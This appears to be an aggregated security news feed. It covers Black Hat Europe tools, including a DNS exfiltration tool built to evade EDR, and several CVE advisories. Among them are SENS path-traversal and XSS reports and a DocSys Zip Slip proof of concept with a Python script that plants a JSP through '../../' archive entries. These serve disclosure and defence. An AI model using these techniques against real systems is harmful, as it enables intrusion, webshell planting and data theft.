Aids and techniques demonstrated at this year’s arsenal track

Aids and techniques demonstrated at this year’s arsenal track

  

Tools to enable the work of security researchers, pen testers, and bug bounty hunters were demonstrated at this year’s Black Hat Europe conference, held at London’s Excel Centre this week.

The annual security conference saw hackers from across the world gather to share research and other insights.

One of the conference’s regular features is the arsenal track, where attendees can witness live demos of various hacking tools.

**Node Security Shield**

One of the tools showcased this year, Node Security Shield, “provides zero-day protection for NodeJS applications”, Lavakumar Kuppan of Domsdog Security, which created the tool, told The Daily Swig.

“It is a defensive tool designed to be used by developers as well as security engineers,” they said.

“Existing defensive systems like WA \[web application firewall\], RASP or any of the supply chain attack protection systems all take a similar approach. They look for known bad patterns. This approach is fine for blocking well known attacks, but it is ineffective against zero-days.

“Node Security Shield takes the opposite approach. Application owners typically know and can define the expected behavior of their application. Node Security Shield ensures that only the defined good behavior is allowed, and any deviations are either blocked or trigger an alert.”

Node Security Shield supports a ‘Resource Access Policy’, inspired by Content Security Policy, a simple JavaScript object where the application owner defines the expected behavior of their app.

Read more of the latest news about hacking tools

“This enables us to block or provide exploitation mitigation against zero-day attacks. Also this approach is extremely fast compared to the other systems that have to compare every incoming request against an ever increasing list of attack patterns.

“With systems like WAF and RASP (runtime application self-protection) there is a risk of legitimate functionality being affected because it is unclear what those products will block and allow. That risk is significantly less with this approach since the application owners have a very clear understanding of what this tool will allow and what it will block.”

The tool was inspired by the Log4Shell vulnerability, a zero-day vulnerability in Log4j, a popular Java logging framework, which could lead to arbitrary code execution. Many application that relied on Log4j became vulnerable as a result of the problem.

“The fact that an application can just randomly make a network connection to a server that the developer’s never intended it to, bothered us a lot.

“So \[we\] set out to build a system where the application owners can define who their application can talk to and enforce it, thereby blocking the exploitation of zero-days like Log4Shell.”

The tool was developed as an internal project at Domdog Security to protect their own NodeJS applications, however the team said they are “aware of at least two other companies that are experimenting with it now”.

Kuppan added: “We are looking to add the ability to control file system access in the next release. Most user feedback has pointed towards wanting the ability to update the Resource Access Policy dynamically without requiring app restart. So that is also in the roadmap.”

**JavaScript obfuscation**

Also presenting at the show was Or Katz, who showed a tool designed to be able to detect JavaScript code as being obfuscated, detecting obfuscation by using structure-based signatures.

It detects JavaScript code before being rendered by the browser “which is more challenging as the obfuscation tool will create different variations of the same malicious JavaScript each time \[it is\] being obfuscated”, Katz told The Daily Swig ahead of his presentation JavaScript Obfuscation – It’s All About the P-a-c-k-e-r-s.

“Using this static code detection approach has \[meant it has\] better performance compared to techniques that require rendering of the page.

The tool also exposes a set of features collected from JavaScript code that enables more detection and classification capabilities.

Katz added: “We have future thoughts on adding more capabilities for more coverage on obfuscation tools, using collecting features for training of machine learning modules that will enable classification of malicious versus benign code.”

**Invoke-DNSteal**

A third tool, Invoke-DNSteal, allows users to perform file transfers using the DNS protocol as a covert communications channel, its creator Joel Gamez told The Daily Swig.

Although it has been designed primarily for pen testers, bug bounty hunters could also use it in “very restricted environments, in order to exfiltrate information from a compromised computer”, Gamez noted.

“Unlike other DNS data exfiltration tools, Invoke-DNSteal stands out for two main features:

The first, is that it does not use any type of library nor does it depend on third parties to work.

“For the server side, it only uses Python and sockets, so any device (however limited) that can run Python can run the server.

“For the victim (or client, if you prefer) side, native PowerShell queries will be used to send information via DNS, thus bypassing many anti-virus and EDR solutions.”

Also unlike other tools, says Gamez, Invoke-DNSteal focuses on the resolver and not the DNS domain.

“All DNS exfiltration tools need a domain to send information to. To do so, they will need to resolve that request using any DNS resolver.

“In the case of Invoke-DNSteal, we focus on using a resolver (or a list of them) controlled by the attacker, which will resolve any domain, even if it does not exist.

“In this way, it is possible to send information to random domains that do not exist, thus circumventing most DNS anti-spoofing solutions on the market.”

Users are also able to control the size and sending time of the payloads, which will also help them to evade protections.

“I decided to create this tool because I did not find any that solved this problem, or that used this technique of using random domains that do not exist to perform these bypasses,” Gamez said.

“In the next versions we will add a sequence control (remember that UDP \[User Datagram Protocol\] does not exist by default), payload encryption by default, a client for Linux and some improvements in payload compression, among many other things.”

YOU MAY ALSO LIKE Black Hat Europe 2022: A defendable internet is possible, but only with industry makeover

Black Hat Europe 2022: Hacking tools showcased at annual security conference

IBM Db2U 3.5, 4.0, and 4.5 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 237210.

**Security Bulletin**

  

**Summary**

IBM has released the below fix for IBM Db2® on Cloud Pak for Data and Db2 Warehouse® on Cloud Pak for Data in response to multiple vulnerabilities found in multiple components.

**Vulnerability Details**

**CVEID:**   CVE-2016-1000023  
**DESCRIPTION:**   Minimatch is vulnerable to a denial of service, caused by a regular expression of minimatch.js. By using a specially crafted glob pattern, a remote attacker could exploit this vulnerability to cause the application to consume an overly large amount of CPU resources  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/118817 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2022-41296  
**DESCRIPTION:**   IBM Db2U is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts.  
CVSS Base score: 6.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/237210 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N)

**CVEID:**   CVE-2021-21303  
**DESCRIPTION:**   Helm could allow a local authenticated attacker to bypass security restrictions, caused by the failure to sanitized multiple fields in various .yaml files. By sending a specially-crafted request, an attacker could exploit this vulnerability to send deceptive, obscure or alter information to a terminal screen.  
CVSS Base score: 5.9  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/196392 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:N/I:H/A:N)

**CVEID:**   CVE-2022-36055  
**DESCRIPTION:**   Helm is vulnerable to a denial of service, caused by a flaw in the strvals package. By sending a specially-crafted input, a remote attacker could exploit this vulnerability to cause memory panics, and results in a denial of service condition.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/235100 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2021-32690  
**DESCRIPTION:**   Helm could allow a remote attacker to obtain sensitive information, caused by improper validation of user-supplied input by the index.yaml file. By gaining access to the chart archives, an attacker could exploit this vulnerability to obtain sensitive information, and use this information to launch further attacks against the affected system.  
CVSS Base score: 6.8  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/203901 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N)

**CVEID:**   CVE-2022-3172  
**DESCRIPTION:**   Kubernetes kube-apiserver is vulnerable to server-side request forgery, caused by a flaw with allowing an aggregated API server to redirect client traffic to any URL. By sending a specially-crafted request, an attacker could exploit this vulnerability to conduct SSRF attack to unexpected actions and the client's API server credentials to third parties.  
CVSS Base score: 5.1  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/236344 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:R/S:C/C:L/I:L/A:L)

**CVEID:**   CVE-2022-29526  
**DESCRIPTION:**   Golang Go could allow a remote attacker to obtain sensitive information, caused by a flaw in the Faccessat function when called with a non-zero flags parameter. By sending a specially-crafted request, an attacker could exploit this vulnerability to obtain accessible file information, and use this information to launch further attacks against the affected system.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/229593 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)

**CVEID:**   CVE-2022-30633  
**DESCRIPTION:**   Golang Go is vulnerable to a denial of service, caused by an uncontrolled recursion flaw in Unmarshal in encoding/xml due to stack exhaustion. By parsing a specially-crafted XML document, a remote attacker could exploit this vulnerability to cause a panic.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/233146 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2022-28131  
**DESCRIPTION:**   Golang Go is vulnerable to a denial of service, caused by an uncontrolled recursion flaw in Decoder.Skip in encoding/xml due to stack exhaustion. By parsing a specially-crafted XML document, a remote attacker could exploit this vulnerability to cause a panic.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/233141 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2022-27664  
**DESCRIPTION:**   Golang Go is vulnerable to a denial of service, caused by a flaw in net/http. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to cause a closing HTTP/2 server connection to hang, and results in a denial of service condition.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/235355 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2022-41297  
**DESCRIPTION:**   IBM Db2U is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts.  
CVSS Base score: 4.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/237212 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N)

**IBM X-Force ID:**   221551  
**DESCRIPTION:**   Helm could allow a remote authenticated attacker to obtain sensitive information, caused by repository credentials being passed to alternate domain. By sending a specially-crafted request, an attacker could exploit this vulnerability to obtain sensitive information, and use this information to launch further attacks against the affected system.  
CVSS Base score: 6.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/221551 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)

**Affected Products and Versions**

All platforms of the following IBM® Db2® on Cloud Pak for Data and Db2 Warehouse® on Cloud Pak for Data refresh levels are affected:

Release

Version

IBM® Db2® on Cloud Pak for Data and Db2 Warehouse® on Cloud Pak for Data

v3.5 through refresh 10  
v4.0 through refresh 9  
v4.5 through refresh 3

  

**Remediation/Fixes**

IBM strongly recommends addressing the vulnerability now by upgrading to the latest IBM Db2® on Cloud Pak for Data and Db2 Warehouse® on Cloud Pak for Data release containing the fix for these issues. It can be applied to any affected fixpack and refresh level of the appropriate release.

**Workarounds and Mitigations**

None

**References**

Off

**Change History**

30 Nov 2022: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSC8M7","label":"IBM Db2 Advanced Edition Cartridge for IBM Cloud Pak for Data"},"Component":"","Platform":\[{"code":"PF025","label":"Platform Independent"}\],"Version":"All","Edition":"","Line of Business":{"code":"LOB10","label":"Data and AI"}},{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSSAIKN","label":"IBM Db2 Warehouse Cartridge for IBM Cloud Pak for Data"},"Component":"","Platform":\[{"code":"PF025","label":"Platform Independent"}\],"Version":"All","Edition":"","Line of Business":{"code":"LOB10","label":"Data and AI"}}\]

CVE-2022-41296: Multiple vulnerabilities affect IBM Db2® on Cloud Pak for Data and Db2 Warehouse® on Cloud Pak for Data

SENS v1.0 is vulnerable to Incorrect Access Control vulnerability.

This project has file upload function. The corresponding code for this function is located in com.liuyanzhao.sens.web.controller.admin#upload

    @PostMapping(value = "/upload", produces = {"application/json;charset=UTF-8"})
        @ResponseBody
        @SystemLog(description = "上传文件", type = LogTypeEnum.ATTACHMENT)
        public Map<String, Object> upload(@RequestParam("file") MultipartFile file,
                                          HttpServletRequest request) {
            return uploadAttachment(file, request);
    }
    

The Upload method calls the uploadAttachment() method.

After audit, we can find that the code does not restrict the ownership of files, so you can access the files uploaded by any user without authorization.  
Use the website provided by the project author to demonstrate the vulnerability.  
The user a, upload a file, the file path is “/upload/2022/11/test1.HTML”

At this time, log in to another user and enter the above path to achieve unauthorized access to any file.

Solution: Add a filtering mechanism.

CVE-2022-45760: The Broken Access Control vulnerability exists in the latest version of SENS · Issue #21 · saysky/SENS

SENS v1.0 has a file upload vulnerability.

This project has file upload function. The corresponding code for this function is located in com.liuyanzhao.sens.web.controller.admin#upload

    @PostMapping(value = "/upload", produces = {"application/json;charset=UTF-8"})
        @ResponseBody
        @SystemLog(description = "上传文件", type = LogTypeEnum.ATTACHMENT)
        public Map<String, Object> upload(@RequestParam("file") MultipartFile file,
                                          HttpServletRequest request) {
            return uploadAttachment(file, request);
    }
    

The Upload method calls the uploadAttachment() method.

After audit, we can find that the code does not restrict the name of the file and the path of the final storage. The path of the final file is “/upload/202/11/+filename”, so there is a file upload attack.  
Use the website provided by the project author to demonstrate the vulnerability.  
Changing the name of the file to be uploaded “.. /.. /ind.html” to attack.

The traversed file was successfully accessed.

Solution: Add a filtering mechanism.

CVE-2022-45759: The file upload vulnerability exists in the latest version of SENS · Issue #20 · saysky/SENS

SENS v1.0 is vulnerable to Cross Site Scripting (XSS).

This project allows new users to register. New users are only allowed to post articles and need to be reviewed by an administrator.  
This function is implemented in the project code: com.liuyanzhao.sens.web.controller.admin#pushPost  
The specific code is as follows:

    @PostMapping(value = "/save")
        @ResponseBody
        @SystemLog(description = "保存文章", type = LogTypeEnum.OPERATION)
        public JsonResult pushPost(@ModelAttribute Post post,
                                   @RequestParam("cateList") List<Long> cateIds,
                                   @RequestParam("tagList") String tagList) {
    
            checkCategoryAndTag(cateIds, tagList);
            User user = getLoginUser();
            Boolean isAdmin = loginUserIsAdmin();
            //1、如果开启了文章审核，非管理员文章默认状态为审核
            Boolean isOpenCheck = StringUtils.equals(SensConst.OPTIONS.get(BlogPropertiesEnum.OPEN_POST_CHECK.getProp()), TrueFalseEnum.TRUE.getValue());
            if (isOpenCheck && !isAdmin) {
                post.setPostStatus(PostStatusEnum.CHECKING.getCode());
            }
            post.setUserId(getLoginUserId());
    
            //2、非管理员只能修改自己的文章，管理员都可以修改
            Post originPost = null;
            if (post.getId() != null) {
                originPost = postService.get(post.getId());
                if (!Objects.equals(originPost.getUserId(), user.getId()) && !isAdmin) {
                    return new JsonResult(ResultCodeEnum.FAIL.getCode(), localeMessageUtil.getMessage("code.admin.common.permission-denied"));
                }
                //以下属性不能修改
                post.setUserId(originPost.getUserId());
                post.setPostViews(originPost.getPostViews());
                post.setCommentSize(originPost.getCommentSize());
                post.setPostLikes(originPost.getPostLikes());
                post.setCommentSize(originPost.getCommentSize());
                post.setDelFlag(originPost.getDelFlag());
            }
            //3、提取摘要
            int postSummary = 100;
            if (StringUtils.isNotEmpty(SensConst.OPTIONS.get(BlogPropertiesEnum.POST_SUMMARY.getProp()))) {
                postSummary = Integer.parseInt(SensConst.OPTIONS.get(BlogPropertiesEnum.POST_SUMMARY.getProp()));
            }
            //文章摘要
            String summaryText = HtmlUtil.cleanHtmlTag(post.getPostContent());
            if (summaryText.length() > postSummary) {
                String summary = summaryText.substring(0, postSummary);
                post.setPostSummary(summary);
            } else {
                post.setPostSummary(summaryText);
            }
    
            //4、分类标签
            List<Category> categories = categoryService.cateIdsToCateList(cateIds, user.getId());
            post.setCategories(categories);
            if (StringUtils.isNotEmpty(tagList)) {
                List<Tag> tags = tagService.strListToTagList(user.getId(), StringUtils.deleteWhitespace(tagList));
                post.setTags(tags);
            }
            //当没有选择文章缩略图的时候，自动分配一张内置的缩略图
            if (StringUtils.equals(post.getPostThumbnail(), BlogPropertiesEnum.DEFAULT_THUMBNAIL.getProp())) {
                String staticUrl = SensConst.OPTIONS.get(BlogPropertiesEnum.BLOG_STATIC_URL.getProp());
                if (!Strings.isNullOrEmpty(staticUrl)) {
                    post.setPostThumbnail(staticUrl + "/static/images/thumbnail/img_" + RandomUtil.randomInt(0, 14) + ".jpg");
                } else {
                    post.setPostThumbnail("/static/images/thumbnail/img_" + RandomUtil.randomInt(0, 14) + ".jpg");
                }
            }
            post.setPostType(PostTypeEnum.POST_TYPE_POST.getValue());
            postService.insertOrUpdate(post);
            if (isOpenCheck && !isAdmin) {
                return new JsonResult(ResultCodeEnum.SUCCESS.getCode(), "文章已提交审核");
            }
            return new JsonResult(ResultCodeEnum.SUCCESS.getCode(), localeMessageUtil.getMessage("code.admin.common.operation-success"));
        }
    

After auditing the code, you can see that there is an xss attack without any wrapping or filtering.  
It is found that the content of the article will be encoded using escapeHTML(), and the article data will be included in the p tag.  
XSS injection can be performed by grabbing traffic packets and directly modifying postTitle or postContent.  
Use the website provided by the project author to demonstrate the vulnerability.  
At this point, the revised content has been submitted for review.  
  
The administrator will be attacked by XSS when logging in to the audit page.  
  
Another problem is that when other undetected xss attacks are used, the administrator will approve them. In this case, storage xss will be formed and all users will be attacked by xss, which is extremely harmful

Solution: Add a filtering mechanism

CVE-2022-45756: The XSS vulnerability exists in the latest version of SENS · Issue #17 · saysky/SENS

A vulnerability classified as critical has been found in RainyGao DocSys 2.02.37. This affects an unknown part of the component ZIP File Decompression Handler. The manipulation leads to path traversal: '../filedir'. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-215271.

**Instructions in English****Description**

There is a Zip Slip vulnerability in the MxsDoc(DocSys) application that can cause malicious jsp files to be uploaded. The vulnerability is located in the BaseController.java file, where the unZip method did not Check "... /". This vulnerability can also be triggered by the upgradeSystem method of the ManageController.java file. Writes a malicious jsp file to the web directory.

**Impact**

1.  Affected version: less than or equal to DocSys\_V2.02.37(latest version)
2.  Condition of utilization：The administrator or super administrator rights are required
3.  Impact：A zip slip vulnerability in this system can result in getshell

**Code Audit**

In com.DocSystem.Controller.BaseController#unZip method exists in the following code snippet:  

The value of entry.getName() is controllable. Inject ".. /", you can write the malicious jsp file to the web root.

Looking for a trigger point, found in com.DocSystem.Controller.ManageController#upgradeSystem method triggers the com.DocSystem.Controller.BaseController#unZip method.  
The key code is as follows:  

**Steps to reproduce****Application Installation**

This system is available on both github and gitee, but there is a war package on github for easy deployment. The download address is as follows: https://github.com/RainyGao-GitHub/DocSys/releases  

After downloading DocSystem.war, unzip it, store it in the tomcat webapps directory, and modify the database configuration file jdbc.properties:

    db.type=mysql
    db.driver=com.mysql.cj.jdbc.Driver
    db.url=jdbc:mysql://localhost:3306/DocSystem1?useUnicode=true&characterEncoding=UTF-8&serverTimezone=UTC
    db.username=root
    db.password=root
    

After the success of the start tomcat, visit http://localhost:8080/DocSystem/web/index.html  
During application initialization, you need to create a system administrator: admin/admin123

**Create malicious compressed files**

tgao.jsp file contents:

    <html>
    <body>
    	<%
            out.println("zip slip getshell.");
        %>
    </body>
    </html>
    

Write a python script to compress the jsp file contents into DocSystem.war and specify the name as ../../DocSystem/tgao.jsp, which corresponds to entry.getName() in the source code.

    import zipfile
    
    if __name__ == "__main__":
        try:
            zipFile = zipfile.ZipFile("DocSystem.war", "a", zipfile.ZIP_DEFLATED)  ##生成的zip文件
            info = zipfile.ZipInfo("DocSystem.war")
            zipFile.write("D:/tgao/pass/tgao.jsp", "../../DocSystem/tgao.jsp", zipfile.ZIP_DEFLATED)  ##压缩的文件和在zip中显示的文件名
            zipFile.close()
        except IOError as e:
            raise e
    

Run the python script to generate the DocSystem.war file

**Exploitation of vulnerabilities**

After using the admin/admin123 login system，go to http://localhost:8080/DocSystem/manager/main.html  
  
Click the Upgrade button and upload the malicious compressed file DocSystem.war  
  
Click the Confirm button，Visit: http://localhost:8080/DocSystem/tgao.jsp  
  
The tgao.jsp file was successfully written.

**Bug Repair Suggestions**

Check whether the contents returned by entry.getName() exist "../" and intercept

**中文说明****漏洞描述**

MxsDoc(DocSys)中存在一个Zip Slip漏洞，可导致上传恶意jsp文件。漏洞位于BaseController.java文件，其中unZip方法解压文件时未对../ 进行检测，导致Zip Slip漏洞存在，另外可通过ManageController.java文件的upgradeSystem方法触发此漏洞。可导致像web目录写入恶意jsp文件。

**漏洞影响**

影响版本：小于等于DocSys\_V2.02.37(最新版本)  
利用条件：需要管理员权限登录  
危害：此系统的zip slip可导致getshell

**漏洞发现**

在com.DocSystem.controller.BaseController#unZip方法中存在如下代码片段  
  
其中entry.getName()的值是可控的，通过../可以将恶意jsp文件写到web根目录。  
寻找触发点，发现在com.DocSystem.controller.ManageController#upgradeSystem方法中触发了com.DocSystem.controller.BaseController#unZip方法  
关键代码如下：  

**漏洞复现****制作恶意压缩包**

tgao.jsp文件内容：

    <html>
    <body>
    	<%
            out.println("zip slip getshell.");
        %>
    </body>
    </html>
    

编写python脚本将jsp文件内容内容压缩至DocSystem.war中，并指定name为../../DocSystem/tgao.jsp，此值对应源码中的entry.getName()内容

    import zipfile
    
    if __name__ == "__main__":
        try:
            zipFile = zipfile.ZipFile("DocSystem.war", "a", zipfile.ZIP_DEFLATED)  ##生成的zip文件
            info = zipfile.ZipInfo("DocSystem.war")
            zipFile.write("D:/tgao/pass/tgao.jsp", "../../DocSystem/tgao.jsp", zipfile.ZIP_DEFLATED)  ##压缩的文件和在zip中显示的文件名
            zipFile.close()
        except IOError as e:
            raise e
    

运行之后生成DocSystem.war文件

**漏洞利用**

使用admin/admin123登录系统后访问：  
http://localhost:8080/DocSystem/manager/main.html  
  
点击系统升级，上传制作完成的恶意压缩文件DocSystem.war  
  
点击确认即可.  
访问：http://localhost:8080/DocSystem/tgao.jsp  
  
tgao.jsp成功被写入。

**修复建议**

检查entry.getName()是否存在../并拦截

CVE-2022-4402: 【缺陷】Zip Slip vulnerability · Issue #I65IYU · Rainy/DocSys - Gitee.com

Debian Linux Security Advisory 5299-1 - Multiple security vulnerabilities have been found in OpenEXR, command-line tools and a library for the OpenEXR image format. Buffer overflows or out-of-bound reads could lead to a denial of service (application crash) if a malformed image file is processed.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5299-1                   security@debian.org  
https://www.debian.org/security/                          Markus Koschany  
December 10, 2022                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : openexr  
CVE ID         : CVE-2021-3598 CVE-2021-3605 CVE-2021-3933 CVE-2021-3941  
                 CVE-2021-23215 CVE-2021-26260 CVE-2021-45942  
Debian Bug     : 992703 990450 990899 1014828 1014828

Multiple security vulnerabilities have been found in OpenEXR, command-line  
tools and a library for the OpenEXR image format. Buffer overflows or  
out-of-bound reads could lead to a denial of service (application crash) if a  
malformed image file is processed.

For the stable distribution (bullseye), these problems have been fixed in  
version 2.5.4-2+deb11u1.

We recommend that you upgrade your openexr packages.

For the detailed security status of openexr please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/openexr

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmOUsp1fFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD  
RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7  
UeSfCg/9GD/cedF6yXuvTz4E68wdwJSZD+FVs840/miN6I0VBtvaApLUVZbyHd2w  
6SjC0G3qdmG8UkczUM/+YFl6O1D6qfLcr4vtZwqgu6SzG9wiA5CyogE1afe9ff1d  
bmS7/zv+WZEUUY9oC+px6yLLKOozsiHJlHB1FWcLaYWj+oFGVs83+PU5deErBCXY  
bbcR0pv+dMAnodhsyCmLr34nyaPfXUzdEI0cdXA63jJm/hOZAlDkUXLddljBCSDt  
GqhNbGDMdgitgxGgYC0MgduaOjprtzxdIJ7KRv4hLJiQB3P3oC2YyyxtCGFRLtKW  
X936b8AdGmUjzWeKURogRTuPDaZkO4DRQOZErBrYyxl2tCs4G29b/PQoO/0tPMlM  
aAH3ccT1FaSg2StM7VmfYaq8Fom7xoDbkEc76+ZSj3E6khhaZpRE2KENm9k042OE  
3y4UQXqYhF/8YKE6WLWBrPhj9kYVHXIBFyKuuZlLXkG2rYsa9Mx11MXfNtRto5ml  
8GITQNB53z+LwVmuFVwkBN1wLDJdGpEvuvsm2+xwzvyAtKYPDWIavuoWbIgHeMur  
7YS8ZGswgyzbDeMx/DsL+9ZGycIddZFddsE8Ag9fBlYrwIs26kBqGN3Zn9ELOVmW  
/w2jcYgAWV9HRxobpP4i73cmPsg7thBSEseeN5ypNYGZSMNWS50=  
=S4Eq  
-----END PGP SIGNATURE-----

Debian Security Advisory 5299-1

** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in RDFlib pyrdfa3 and classified as problematic. This issue affects the function _get_option of the file pyRdfa/__init__.py. The manipulation leads to cross site scripting. The attack may be initiated remotely. The name of the patch is ffd1d62dd50d5f4190013b39cedcdfbd81f3ce3e. It is recommended to apply a patch to fix this issue. The identifier VDB-215249 was assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

@@ -455,6 +455,16 @@ def \_get\_input(self, name) : (type, value, traceback) \= sys.exc\_info() raise FailedSource(value)  
@staticmethod def \_validate\_output\_format(outputFormat): """ Malicious actors may create XSS style issues by using an illegal output format... better be careful """ \# protection against possible malicious URL call if outputFormat not in \["turtle", "n3", "xml", "pretty-xml", "nt", "json-ld"\] : outputFormat \= "turtle" return outputFormat  
#################################################################################################################### \# Externally used methods # @@ -687,10 +697,12 @@ def rdf\_from\_sources(self, names, outputFormat = "turtle", rdfOutput = False) : @return: a serialized RDF Graph @rtype: string """ \# protection against possible malicious URL call outputFormat \= pyRdfa.\_validate\_output\_format(outputFormat);  
\# This is better because it gives access to the various, non-standard serializations \# If it does not work because the extra are not installed, fall back to the standard \# rdlib distribution...  
if rdflib.\_\_version\_\_ \>= "3.0.0" : graph \= Graph() else : @@ -881,7 +893,7 @@ def \_get\_option(param, compare\_value, default) : \# This is really for testing purposes only, it is an unpublished flag to force RDF output no \# matter what try : graph \= processor.rdf\_from\_source(input, outputFormat, rdfOutput \= ("forceRDFOutput" in list(form.keys())) or not htmlOutput) outputFormat \= pyRdfa.\_validate\_output\_format(outputFormat); if outputFormat \== "n3" : retval \= 'Content-Type: text/rdf+n3; charset=utf-8\\n' elif outputFormat \== "nt" or outputFormat \== "turtle" : @@ -890,6 +902,7 @@ def \_get\_option(param, compare\_value, default) : retval \= 'Content-Type: application/ld+json; charset=utf-8\\n' else : retval \= 'Content-Type: application/rdf+xml; charset=utf-8\\n' graph \= processor.rdf\_from\_source(input, outputFormat, rdfOutput \= ("forceRDFOutput" in list(form.keys())) or not htmlOutput) retval += '\\n' retval += graph return retval @@ -936,13 +949,13 @@ def \_get\_option(param, compare\_value, default) : else : retval +="<dt>URI received:</dt><dd><code>'%s'</code></dd>\\n" % cgi.escape(uri) if "host\_language" in list(form.keys()) : retval +="<dt>Media Type:</dt><dd>%s</dd>\\n" % media\_type retval +="<dt>Media Type:</dt><dd>%s</dd>\\n" % cgi.escape(media\_type) if "graph" in list(form.keys()) : retval +="<dt>Requested graphs:</dt><dd>%s</dd>\\n" % form.getfirst("graph").lower() retval +="<dt>Requested graphs:</dt><dd>%s</dd>\\n" % cgi.escape(form.getfirst("graph").lower()) else : retval +="<dt>Requested graphs:</dt><dd>default</dd>\\n" retval +="<dt>Output serialization format:</dt><dd> %s</dd>\\n" % outputFormat if "space\_preserve" in form : retval +="<dt>Space preserve:</dt><dd> %s</dd>\\n" % form\["space\_preserve"\].value if "space\_preserve" in form : retval +="<dt>Space preserve:</dt><dd> %s</dd>\\n" % cgi.escape(form\["space\_preserve"\].value) retval +="</dl>\\n" retval +="</body>\\n" retval +="</html>\\n"

CVE-2022-4396: xss changes · RDFLib/pyrdfa3@ffd1d62

A new attack method can be used to circumvent web application firewalls (WAFs) of various vendors and infiltrate systems, potentially enabling attackers to gain access to sensitive business and customer information.
